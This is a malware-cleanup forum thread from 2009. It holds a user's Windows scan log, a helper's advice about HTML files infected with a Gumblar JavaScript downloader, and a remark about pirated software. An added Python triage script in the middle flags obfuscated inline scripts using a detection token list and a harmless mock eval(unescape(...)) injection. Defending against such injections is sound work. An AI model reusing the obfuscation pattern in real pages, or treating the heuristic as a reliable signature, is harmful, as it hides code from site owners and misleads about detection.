[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=36
"NoDriveAutoRun"=FFFFFFFF
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
"C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe"="C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe:*:Enabled:SMC Service"
"C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE"="C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE:*:Enabled:SNAC Service"
"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"="C:\Program Files\Common Files\Symantec Shared\ccApp.exe:*:Enabled:Symantec Email"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe"="C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"
"C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

======File associations======

.js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1"

======List of files/folders created in the last 1 months======

2009-08-05 15:03:42 ----D---- C:\Program Files\Winamp
2009-08-05 15:03:42 ----D---- C:\Documents and Settings\me\Application Data\Winamp
2009-08-05 11:29:18 ----D---- C:\WINDOWS\LastGood
2009-08-05 10:09:35 ----RASHD---- C:\autorun.inf
2009-08-05 09:17:53 ----D---- C:\Documents and Settings\All Users\Application Data\Corel
2009-08-05 09:14:05 ----D---- C:\Program Files\Common Files\Corel
2009-08-05 09:12:09 ----D---- C:\Program Files\Corel
2009-08-04 18:33:39 ----D---- C:\Program Files\ERUNT
2009-08-04 18:01:07 ----D---- C:\HostsXpert
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaws.exe
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaw.exe
2009-08-04 00:03:13 ----A---- C:\WINDOWS\system32\java.exe
2009-08-04 00:02:47 ----D---- C:\Program Files\Java
2009-07-31 18:25:21 ----D---- C:\_OTM
2009-07-30 18:43:16 ----D---- C:\Documents and Settings\me\Application Data\Teleca
2009-07-30 18:34:07 ----D---- C:\Documents and Settings\me\Application Data\Sony Ericsson
2009-07-30 18:33:17 ----D---- C:\Program Files\Intuwave
2009-07-30 18:33:07 ----D---- C:\Program Files\Symbian
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files\Sony Ericsson Shared
2009-07-30 18:31:22 ----D---- C:\Documents and Settings\All Users\Application Data\Sony Ericsson
2009-07-30 18:30:38 ----D---- C:\Program Files\Common Files\Teleca Shared
2009-07-30 18:30:32 ----D---- C:\Program Files\Sony Ericsson
2009-07-30 18:30:32 ----D---- C:\Documents and Settings\All Users\Application Data\Teleca
2009-07-28 23:43:09 ----D---- C:\rsit
2009-07-28 00:24:24 ----A---- C:\startup.txt
2009-07-28 00:23:45 ----D---- C:\Program Files\Trend Micro
2009-07-22 14:21:05 ----SD---- C:\ComboFix
2009-07-21 12:45:53 ----D---- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:40 ----D---- C:\Program Files\SUPERAntiSpyware
2009-07-21 12:45:40 ----D---- C:\Documents and Settings\me\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:15 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
2009-07-21 12:37:36 ----SHD---- C:\RECYCLER
2009-07-21 12:33:14 ----A---- C:\ComboFix.txt
2009-07-20 17:28:56 ----D---- C:\Documents and Settings\me\Application Data\Malwarebytes
2009-07-20 17:28:49 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2009-07-20 17:28:49 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-07-19 12:27:56 ----RHD---- C:\MSOCache
2009-07-19 11:12:33 ----D---- C:\Program Files\Caricature Studio Green 3.6
2009-07-19 11:11:35 ----D---- C:\Documents and Settings\me\Application Data\Carnival Software
2009-07-16 23:30:50 ----HDC---- C:\WINDOWS\$NtUninstallKB973346$
2009-07-16 23:30:40 ----HDC---- C:\WINDOWS\$NtUninstallKB971633$
2009-07-16 23:27:19 ----HDC---- C:\WINDOWS\$NtUninstallKB961371$
2009-07-10 14:17:03 ----D---- C:\Mp3s

======List of files/folders modified in the last 1 months======

2009-08-06 20:17:16 ----D---- C:\WINDOWS\Prefetch
2009-08-06 00:05:52 ----D---- C:\WINDOWS\system32\CatRoot2
2009-08-05 23:33:04 ----D---- C:\WINDOWS\Temp
2009-08-05 15:03:42 ----RD---- C:\Program Files
2009-08-05 12:54:40 ----D---- C:\Downloads
2009-08-05 12:19:00 ----SHD---- C:\WINDOWS\Installer
2009-08-05 12:18:58 ----SHD---- C:\Config.Msi
2009-08-05 11:34:33 ----D---- C:\Documents and Settings\me\Application Data\Download Manager
2009-08-05 11:29:19 ----SD---- C:\WINDOWS\Downloaded Program Files
2009-08-05 11:29:18 ----D---- C:\WINDOWS
2009-08-05 11:28:15 ----D---- C:\WINDOWS\network diagnostic
2009-08-05 10:08:00 ----RASH---- C:\boot.ini
2009-08-05 10:08:00 ----A---- C:\WINDOWS\win.ini
2009-08-05 10:08:00 ----A---- C:\WINDOWS\system.ini
2009-08-05 10:00:43 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-08-05 09:56:05 ----D---- C:\WINDOWS\ERDNT
2009-08-05 09:15:03 ----RSD---- C:\WINDOWS\Fonts
2009-08-05 09:14:39 ----D---- C:\WINDOWS\WinSxS
2009-08-05 09:14:05 ----D---- C:\Program Files\Common Files
2009-08-04 19:25:27 ----D---- C:\WINDOWS\system32\drivers
2009-08-04 19:14:14 ----D---- C:\WINDOWS\system32
2009-08-04 19:13:20 ----SD---- C:\WINDOWS\Tasks
2009-08-04 00:02:52 ----A---- C:\WINDOWS\system32\deploytk.dll
2009-08-03 14:18:33 ----D---- C:\Documents and Settings\All Users\Application Data\NOS
2009-08-03 14:18:29 ----D---- C:\Program Files\NOS
2009-08-03 14:17:23 ----D---- C:\Program Files\Unlocker
2009-08-03 14:14:10 ----D---- C:\Program Files\TeamViewer
2009-08-03 13:34:35 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Common Files\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Adobe
2009-08-03 12:08:44 ----D---- C:\Pictures
2009-07-30 18:43:30 ----HD---- C:\WINDOWS\inf
2009-07-30 18:33:17 ----HD---- C:\Program Files\InstallShield Installation Information
2009-07-30 18:30:39 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-07-30 18:28:15 ----D---- C:\WINDOWS\Downloaded Installations
2009-07-28 12:51:52 ----A---- C:\WINDOWS\ntbtlog.txt
2009-07-28 00:43:12 ----D---- C:\Harsh
2009-07-24 20:49:30 ----D---- C:\Program Files\Mozilla Firefox
2009-07-24 11:58:36 ----D---- C:\RIIMUN
2009-07-22 14:22:13 ----SHD---- C:\System Volume Information
2009-07-22 14:22:13 ----D---- C:\WINDOWS\system32\Restore
2009-07-21 16:14:51 ----D---- C:\WINDOWS\pss
2009-07-21 12:16:32 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-07-20 09:09:41 ----D---- C:\WINDOWS\twain_32
2009-07-20 09:04:30 ----D---- C:\Temp
2009-07-20 08:50:42 ----D---- C:\WINDOWS\system32\NtmsData
2009-07-19 12:36:23 ----D---- C:\Program Files\MSBuild
2009-07-19 12:35:35 ----D---- C:\Program Files\Common Files\DESIGNER
2009-07-19 12:35:23 ----D---- C:\WINDOWS\SHELLNEW
2009-07-19 00:35:05 ----D---- C:\Amrita
2009-07-18 23:37:22 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-07-18 23:27:37 ----SD---- C:\Documents and Settings\me\Application Data\Microsoft
2009-07-16 23:44:20 ----D---- C:\Program Files\Oberon Media
2009-07-16 23:38:30 ----D---- C:\Program Files\Bonjour
2009-07-16 23:30:53 ----A---- C:\WINDOWS\imsins.BAK
2009-07-16 23:30:49 ----HD---- C:\WINDOWS\$hf_mig$
2009-07-16 23:30:46 ----RSHD---- C:\WINDOWS\system32\dllcache
2009-07-10 14:03:12 ----D---- C:\Velocity
2009-07-07 08:10:58 ----A---- C:\WINDOWS\system32\MRT.exe

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 eabfiltr;eabfiltr; C:\WINDOWS\system32\DRIVERS\eabfiltr.sys [2005-09-19 7808]
R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys []
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 36352]
R1 kbdhid;Keyboard HID Driver; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14592]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys []
R1 SRTSP;SRTSP; C:\WINDOWS\System32\Drivers\SRTSP.SYS [2009-03-04 280112]
R1 SRTSPX;SRTSPX; C:\WINDOWS\System32\Drivers\SRTSPX.SYS [2009-03-04 43824]
R1 SYMTDI;SYMTDI; C:\WINDOWS\System32\Drivers\SYMTDI.SYS [2008-08-21 191536]
R1 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\WINDOWS\system32\DRIVERS\wmiacpi.sys [2008-04-14 8832]
R1 WPS;WPS; \??\C:\WINDOWS\system32\drivers\wpsdrvnt.sys []
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-05 12032]
R2 adfs;adfs; C:\WINDOWS\system32\drivers\adfs.sys [2008-08-14 74720]
R2 mdmxsdk;mdmxsdk; C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys [2006-02-15 12672]
R3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-14 60800]
R3 BTKRNL;Bluetooth Bus Enumerator; C:\WINDOWS\system32\DRIVERS\btkrnl.sys [2006-05-12 1342602]
R3 BTWUSB;WIDCOMM USB Bluetooth Driver; C:\WINDOWS\System32\Drivers\btwusb.sys [2006-05-12 57320]
R3 CmBatt;Microsoft ACPI Control Method Battery Driver; C:\WINDOWS\system32\DRIVERS\CmBatt.sys [2008-04-14 13952]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys []
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys [2009-03-19 23400]
R3 HBtnKey;HBtnKey; C:\WINDOWS\system32\DRIVERS\cpqbttn.sys [2005-09-19 9344]
R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\CHDAud.sys [2006-06-02 572928]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-14 10368]
R3 HSF_DPV;HSF_DPV; C:\WINDOWS\system32\DRIVERS\HSF_DPV.sys [2006-04-20 995712]
R3 HSFHWAZL;HSFHWAZL; C:\WINDOWS\system32\DRIVERS\HSFHWAZL.sys [2006-04-20 208000]
R3 ialm;ialm; C:\WINDOWS\system32\DRIVERS\ialmnt5.sys [2006-03-23 1166972]
R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2001-08-17 12160]
R3 NAVENG;NAVENG; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.040\NAVENG.SYS []
R3 NAVEX15;NAVEX15; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.040\NAVEX15.SYS []
R3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-14 61824]
R3 rimmptsk;rimmptsk; C:\WINDOWS\system32\DRIVERS\rimmptsk.sys [2005-11-17 28928]
R3 rimsptsk;rimsptsk; C:\WINDOWS\system32\DRIVERS\rimsptsk.sys [2005-12-22 51840]
R3 rismxdp;Ricoh xD-Picture Card Driver; C:\WINDOWS\system32\DRIVERS\rixdptsk.sys [2005-11-01 308992]
R3 sdbus;sdbus; C:\WINDOWS\system32\DRIVERS\sdbus.sys [2008-04-14 79232]
R3 SymEvent;SymEvent; \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS []
R3 SYMREDRV;SYMREDRV; C:\WINDOWS\System32\Drivers\SYMREDRV.SYS [2008-08-21 27696]
R3 SynTP;Synaptics TouchPad Driver; C:\WINDOWS\system32\DRIVERS\SynTP.sys [2006-06-17 193120]
R3 Teefer2;Teefer2 Miniport; C:\WINDOWS\system32\DRIVERS\teefer2.sys [2008-10-14 49536]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-14 30208]
R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-14 59520]
R3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-14 26368]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-14 20608]
R3 w39n51;Intel(R) PRO/Wireless 3945ABG Adapter Driver; C:\WINDOWS\system32\DRIVERS\w39n51.sys [2006-04-21 1429632]
R3 winachsf;winachsf; C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys [2006-04-20 727296]
R3 WpsHelper;WpsHelper; \??\C:\WINDOWS\system32\drivers\WpsHelper.sys []
R3 zebrceb;Sony Ericsson Cable Emulation Bus (WDM); C:\WINDOWS\system32\DRIVERS\zebrceb.sys [2007-04-13 62984]
S3 catchme;catchme; \??\C:\DOCUME~1\me\LOCALS~1\Temp\catchme.sys []
S3 COH_Mon;COH_Mon; \??\C:\WINDOWS\system32\Drivers\COH_Mon.sys []
S3 E100B;Intel(R) PRO Network Connection Driver; C:\WINDOWS\system32\DRIVERS\e100b325.sys [2006-04-11 163328]
S3 eabusb;eabusb; C:\WINDOWS\system32\DRIVERS\eabusb.sys [2005-09-19 5760]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-04-11 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-04-11 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-04-11 21456]
S3 Profos;Profos; C:\WINDOWS\system32\drivers\Profos.sys []
S3 rtl8139;Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver; C:\WINDOWS\system32\DRIVERS\RTL8139.SYS [2004-08-04 20992]
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 sffdisk;SFF Storage Class Driver; C:\WINDOWS\system32\DRIVERS\sffdisk.sys [2008-04-14 11904]
S3 sffp_sd;SFF Storage Protocol Driver for SDBus; C:\WINDOWS\system32\DRIVERS\sffp_sd.sys [2008-04-14 11008]
S3 SRTSPL;SRTSPL; C:\WINDOWS\System32\Drivers\SRTSPL.SYS [2009-03-04 319920]
S3 Trufos;Trufos; C:\WINDOWS\system32\drivers\Trufos.sys []
S3 UIUSys;Conexant Setup API; C:\WINDOWS\system32\DRIVERS\UIUSYS.SYS []
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-14 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-14 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-14 15104]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 zebrbus;Sony Ericsson Composite Device driver; C:\WINDOWS\system32\DRIVERS\zebrbus.sys [2007-04-13 83080]
S3 zebrmdfl;Sony Ericsson Modem Filter; C:\WINDOWS\system32\DRIVERS\zebrmdfl.sys [2007-04-13 15112]
S3 zebrmdm;Sony Ericsson Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdm.sys [2007-04-13 108296]
S3 zebrmdmc;Sony Ericsson mRouter Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdmc.sys [2007-04-13 108424]
S3 zebrsce;Sony Ericsson PC-Connect Port; C:\WINDOWS\system32\DRIVERS\zebrsce.sys [2007-04-13 90888]
S4 agp440;Intel AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agp440.sys [2008-04-14 42368]
S4 agpCPQ;Compaq AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agpCPQ.sys [2008-04-14 44928]
S4 alim1541;ALI AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\alim1541.sys [2008-04-14 42752]
S4 amdagp;AMD AGP Bus Filter Driver; C:\WINDOWS\system32\DRIVERS\amdagp.sys [2008-04-14 43008]
S4 cbidf;cbidf; C:\WINDOWS\system32\DRIVERS\cbidf2k.sys [2001-08-18 13952]
S4 sisagp;SIS AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\sisagp.sys [2008-04-14 40960]
S4 SysPlant;SysPlant for NT; C:\WINDOWS\SYSTEM32\Drivers\SysPlant.sys [2009-05-12 91976]
S4 viaagp;VIA AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\viaagp.sys [2008-04-14 42240]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 btwdins;Bluetooth Service; C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe [2006-05-12 258103]
R2 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-08-04 152984]
R2 PSI_SVC_2;Protexis Licensing V2; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [2007-07-24 185632]
R2 SmcService;Symantec Management Client; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [2009-05-12 1803592]
R2 Symantec AntiVirus;Symantec Endpoint Protection; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [2009-05-12 2440632]
R3 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2009-06-05 541992]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-07-27 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
S3 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2009-03-20 3093880]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 AddFiltr;AddFiltr; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\AddFiltr.exe [2006-06-12 126976]
S4 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2009-06-05 144712]
S4 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-11 655624]
S4 gusvc;Google Software Updater; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-06-05 182768]
S4 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
S4 IDriverT;InstallDriver Table Manager; c:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S4 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-05-18 49152]
S4 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2006-10-27 65824]
S4 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2006-10-26 441136]
S4 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-04-11 65795]
S4 RichVideo;Cyberlink RichVideo Service(CRVS); C:\Program Files\CyberLink\Shared Files\RichVideo.exe [2005-08-08 167936]
S4 SNAC;Symantec Network Access Control; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [2009-02-01 320840]
S4 WMPNetworkSvc;Windows Media Player Network Sharing Service; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-10-18 913408]

-----------------EOF-----------------
hn2009
Active Member
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 6th, 2009, 3:07 pm

Hi :)

Though what I did was to connect my USB Hard Drive and have that scanned using the Kaspersky Online Scanner. So I'm also posting the results for that; although I do have a question regarding it: OTM has moved the infected files as follows - "C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1" however I need to use these html files and would like to know how to get rid of the Trojan.
The files in question are irreparably compromised, so no, it is not a good idea to move them from the OTM backup as there is no way to disinfect them and if moved back they will in turn re-infect your computer.

The files on your USB Hard-Drive are also compromised and I notice you have some illegal software also:

H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
If I may bring your attention to this part of the forum policy:
Any time the helper detects that you may have illegal software on your machine, that helper may stop assisting you immediately until you can demonstrate that you have rectified the situation. We will not support fixing machines with pirated or otherwise illegal software.
Please remove these files from your USB Hard-Drive and in fact my actual advice would be to remove all flagged files and/or format the whole drive.

If however you wish not to format the drive I propose we disinfect the drive in question and you let myself remove all the offending files with a custom OTM script.

Please let myself know your decision about this as otherwise I am wasting my time attempting to clean your system as it will become infected again, thank you.

Next:

I've tried something and would like to know if I'm right... I noticed the following code right before the body tag and deleted it. Did I do the right thing? Will it completely eradicate the problem? Please advise. Thanks.
I can not advise you about this I'm afraid as I only provide Anti-Malware support for home computers, specifically home use operating systems and I am not a computer programmer.
Dakeyras
MRU Honors Graduate
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra
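The poster asked above about a script block found just before the body tag of the site files that Kaspersky flagged as Trojan-Downloader.JS.Gumblar.a, and the helper rightly declined to hand-edit them. When a site backup holds dozens of copies of the same pages, deciding which ones carry the injection is better done by a scripted triage pass than by eyeballing each file. The script below is an added example written for this page; it is not code from the thread, from OTM, or from any AV vendor. It walks a copy of the site, scores every inline script block (and every bare .js file) on features typical of obfuscated downloader stubs, and reports the files that cross a threshold. The token list, the escape-run length and the threshold are my assumptions, not a detection signature for the named trojan, and the two sample pages are constructed for the demo.

```python
"""Heuristic triage for web files that may carry an injected script.

Added example for this thread, not code from the forum or any AV vendor.  It walks
a copy of the site, looks at every inline <script> block in .html/.htm files (and
whole .js files) and scores features common to obfuscated downloader stubs.  The
token list, the escape-run length and the threshold are assumptions, not a
detection signature for Trojan-Downloader.JS.Gumblar.a.
"""
import re
import sys
from pathlib import Path

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Build-then-execute primitives that obfuscated injections lean on (assumed list).
SUSPICIOUS_TOKENS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(")
# Eight or more consecutive %xx or \xNN escapes: hand-written code rarely looks like this.
HEX_ESCAPES = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){8,}")


def score_script(body: str) -> int:
    """Return an integer suspicion score for one script body (0 = nothing odd)."""
    score = sum(1 for tok in SUSPICIOUS_TOKENS if tok in body)
    if HEX_ESCAPES.search(body):
        score += 2
    # A single very long line with almost no spaces is typical of machine-inserted code.
    longest = max((len(line) for line in body.splitlines()), default=0)
    if longest > 500 and body.count(" ") < longest / 20:
        score += 1
    return score


def suspicious_scripts(html: str, threshold: int = 3) -> list:
    """List (score, first 80 chars) for each inline script at or above threshold."""
    hits = []
    for m in SCRIPT_BLOCK.finditer(html):
        s = score_script(m.group(1))
        if s >= threshold:
            hits.append((s, m.group(0)[:80]))
    return hits


def scan_tree(root: Path, threshold: int = 3) -> dict:
    """Map each flagged file (path relative to root) to its list of hits."""
    report = {}
    for p in root.rglob("*"):
        suffix = p.suffix.lower()
        if suffix not in {".html", ".htm", ".js"}:
            continue
        text = p.read_text(errors="replace")
        if suffix == ".js":              # a bare .js file is one script body
            s = score_script(text)
            hits = [(s, text[:80])] if s >= threshold else []
        else:
            hits = suspicious_scripts(text, threshold)
        if hits:
            report[p.relative_to(root).as_posix()] = hits
    return report


# Constructed sample pages (not taken from the infected site in the thread).
CLEAN_PAGE = (
    "<html><head><title>about</title>\n"
    '<script src="menu.js"></script>\n'
    "<script>document.getElementById('menu').style.display = 'block';</script>\n"
    "</head><body><p>About us</p></body></html>"
)
INJECTED_PAGE = (
    "<html><head><title>about</title></head>\n"
    '<script>eval(unescape("%66%75%6e%63%74%69%6f%6e%20%64%28%29%7b%7d"))</script>\n'
    "<body><p>About us</p></body></html>"
)

if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    if target is None:
        print("clean:", suspicious_scripts(CLEAN_PAGE))
        print("injected:", suspicious_scripts(INJECTED_PAGE))
    else:
        for path, hits in scan_tree(target).items():
            print(path, hits)
```

Run it with the path of the site copy as the only argument to get one line per flagged file; with no argument it scores the two constructed pages. A score of zero on a file does not prove it clean, which is exactly why the helper's advice to discard the whole set of compromised pages rather than patch them stands.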

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 7th, 2009, 12:26 am

Hey,

Please go ahead and provide a script to remove the softwares in question.

Thanks,
Harsh
hn2009
Active Member
Posts: 12
Joined: July 22nd, 2009, 4:59 am

